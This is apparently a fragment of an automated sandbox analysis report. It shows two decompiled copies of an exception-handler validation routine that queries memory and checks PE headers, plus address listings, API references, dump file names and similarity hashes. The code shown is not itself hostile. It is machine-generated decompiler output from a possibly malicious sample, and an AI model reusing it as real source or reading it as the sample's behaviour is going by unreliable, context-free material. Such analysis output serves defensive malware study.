                                                                                                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *0x6e054240 = 1;
                                                                                                                                                                                                                                                                                    							__eflags =  *0x6e054240;
                                                                                                                                                                                                                                                                                    							if( *0x6e054240 != 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                                                                                                    									 *0x6e054240 = 0;
                                                                                                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                                                                                                    									_t90 = 0x6e054200 + _t100 * 4;
                                                                                                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                                                                                                    									 *0x6e0541f8 = _t81;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x6e054200 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0x6e054200 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                                                                    0x6e052699
                                                                                                                                                                                                                                                                                    0x6e052667
                                                                                                                                                                                                                                                                                    0x6e052668
                                                                                                                                                                                                                                                                                    0x6e05266a
                                                                                                                                                                                                                                                                                    0x6e05266c
                                                                                                                                                                                                                                                                                    0x6e05266c
                                                                                                                                                                                                                                                                                    0x6e05266e
                                                                                                                                                                                                                                                                                    0x6e052670
                                                                                                                                                                                                                                                                                    0x6e052672
                                                                                                                                                                                                                                                                                    0x6e052686
                                                                                                                                                                                                                                                                                    0x6e052686
                                                                                                                                                                                                                                                                                    0x6e052689
                                                                                                                                                                                                                                                                                    0x6e05268b
                                                                                                                                                                                                                                                                                    0x6e05268b
                                                                                                                                                                                                                                                                                    0x6e05268c
                                                                                                                                                                                                                                                                                    0x6e05268c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052674
                                                                                                                                                                                                                                                                                    0x6e052674
                                                                                                                                                                                                                                                                                    0x6e052674
                                                                                                                                                                                                                                                                                    0x6e05267d
                                                                                                                                                                                                                                                                                    0x6e05267e
                                                                                                                                                                                                                                                                                    0x6e052680
                                                                                                                                                                                                                                                                                    0x6e052682
                                                                                                                                                                                                                                                                                    0x6e052682
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052674
                                                                                                                                                                                                                                                                                    0x6e052672
                                                                                                                                                                                                                                                                                    0x6e05264e
                                                                                                                                                                                                                                                                                    0x6e052655
                                                                                                                                                                                                                                                                                    0x6e052655
                                                                                                                                                                                                                                                                                    0x6e052657
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052659
                                                                                                                                                                                                                                                                                    0x6e05265a
                                                                                                                                                                                                                                                                                    0x6e05265d
                                                                                                                                                                                                                                                                                    0x6e05265f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e05265f
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052655
                                                                                                                                                                                                                                                                                    0x6e0525d8
                                                                                                                                                                                                                                                                                    0x6e0525db
                                                                                                                                                                                                                                                                                    0x6e0525e0
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e0525e9
                                                                                                                                                                                                                                                                                    0x6e0525eb
                                                                                                                                                                                                                                                                                    0x6e0525f1
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e0525f7
                                                                                                                                                                                                                                                                                    0x6e0525fd
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052603
                                                                                                                                                                                                                                                                                    0x6e052605
                                                                                                                                                                                                                                                                                    0x6e05260e
                                                                                                                                                                                                                                                                                    0x6e052612
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052618
                                                                                                                                                                                                                                                                                    0x6e05261b
                                                                                                                                                                                                                                                                                    0x6e05261d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052624
                                                                                                                                                                                                                                                                                    0x6e052626
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052628
                                                                                                                                                                                                                                                                                    0x6e05262c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e05262c
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052517
                                                                                                                                                                                                                                                                                    0x6e052517
                                                                                                                                                                                                                                                                                    0x6e052517
                                                                                                                                                                                                                                                                                    0x6e05251e
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052520
                                                                                                                                                                                                                                                                                    0x6e052521
                                                                                                                                                                                                                                                                                    0x6e052523
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x6e052523
                                                                                                                                                                                                                                                                                    0x6e05254b
                                                                                                                                                                                                                                                                                    0x6e05254d
                                                                                                                                                                                                                                                                                    0x00000000

APIs
• NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E052536
Memory Dump Source
• Source File: 00000000.00000002.1182493372.000000006E051000.00000020.00020000.sdmp, Offset: 6E050000, based on PE: true
• Associated: 00000000.00000002.1182478467.000000006E050000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182531487.000000006E053000.00000002.00020000.sdmp
• Associated: 00000000.00000002.1182543667.000000006E055000.00000004.00020000.sdmp
• Associated: 00000000.00000002.1182556764.000000006E056000.00000002.00020000.sdmp
Similarity
• API ID: MemoryQueryVirtual
• String ID:
• API String ID: 2850889275-0
• Opcode ID: 2f94c6c16abc242b7db6f56202ed1353552ee9206f1663e5b984268df60000ab
• Instruction ID: bfcb9fb096dcbcb68dad5823c24130d290c2334e485ad7bf1816dd02a1dbcd4b
• Opcode Fuzzy Hash: 2f94c6c16abc242b7db6f56202ed1353552ee9206f1663e5b984268df60000ab
• Instruction Fuzzy Hash: B061E130614603DFEB49CEA9CBA07A973F5EF85394F64842AD816D7384F730D8A2CA51
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC81CD(long _a4) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                                                                                                    				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0xfca330; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0xfca378 = 1;
										__eflags =  *0xfca378;
										if( *0xfca378 != 0) {
											goto L60;
										}
										_t84 =  *0xfca330; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0xfca378 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
                                                                                                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                                                                                                    													 *0xfca330 = _t86;
                                                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                                                    												do {
                                                                                                                                                                                                                                                                                    													_t68 = 0xfca338 + _t94 * 4;
                                                                                                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										_t69 = 0xfca334 + _t84 * 4;
                                                                                                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							 *0xfca378 = 1;
                                                                                                                                                                                                                                                                                    							__eflags =  *0xfca378;
                                                                                                                                                                                                                                                                                    							if( *0xfca378 != 0) {
                                                                                                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    							if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                                                                                                    									 *0xfca378 = 0;
                                                                                                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								do {
                                                                                                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                                                                                                    									_t90 = 0xfca338 + _t100 * 4;
                                                                                                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							_t25 = _t81 - 1; // -1
                                                                                                                                                                                                                                                                                    							_t58 = _t25;
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                                                                                                    									 *0xfca330 = _t81;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t28 = _t81 - 1; // 0x0
                                                                                                                                                                                                                                                                                    								_t58 = _t28;
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0xfca338 + _t58 * 4)) - _t110;
                                                                                                                                                                                                                                                                                    								if( *((intOrPtr*)(0xfca338 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                                                                                                    									break;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								break;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}




































                                                                                                                                                                                                                                                                                    0x00fc8235
                                                                                                                                                                                                                                                                                    0x00fc8239
                                                                                                                                                                                                                                                                                    0x00fc823d
                                                                                                                                                                                                                                                                                    0x00fc824b
                                                                                                                                                                                                                                                                                    0x00fc824b
                                                                                                                                                                                                                                                                                    0x00fc8253
                                                                                                                                                                                                                                                                                    0x00fc8259
                                                                                                                                                                                                                                                                                    0x00fc825b
                                                                                                                                                                                                                                                                                    0x00fc825d
                                                                                                                                                                                                                                                                                    0x00fc826d
                                                                                                                                                                                                                                                                                    0x00fc827a
                                                                                                                                                                                                                                                                                    0x00fc827e
                                                                                                                                                                                                                                                                                    0x00fc8283
                                                                                                                                                                                                                                                                                    0x00fc8285
                                                                                                                                                                                                                                                                                    0x00fc8303
                                                                                                                                                                                                                                                                                    0x00fc8303
                                                                                                                                                                                                                                                                                    0x00fc8287
                                                                                                                                                                                                                                                                                    0x00fc8287
                                                                                                                                                                                                                                                                                    0x00fc8287
                                                                                                                                                                                                                                                                                    0x00fc8305
                                                                                                                                                                                                                                                                                    0x00fc8307
                                                                                                                                                                                                                                                                                    0x00fc83e8
                                                                                                                                                                                                                                                                                    0x00fc83e8
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc830d
                                                                                                                                                                                                                                                                                    0x00fc830d
                                                                                                                                                                                                                                                                                    0x00fc8314
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc831a
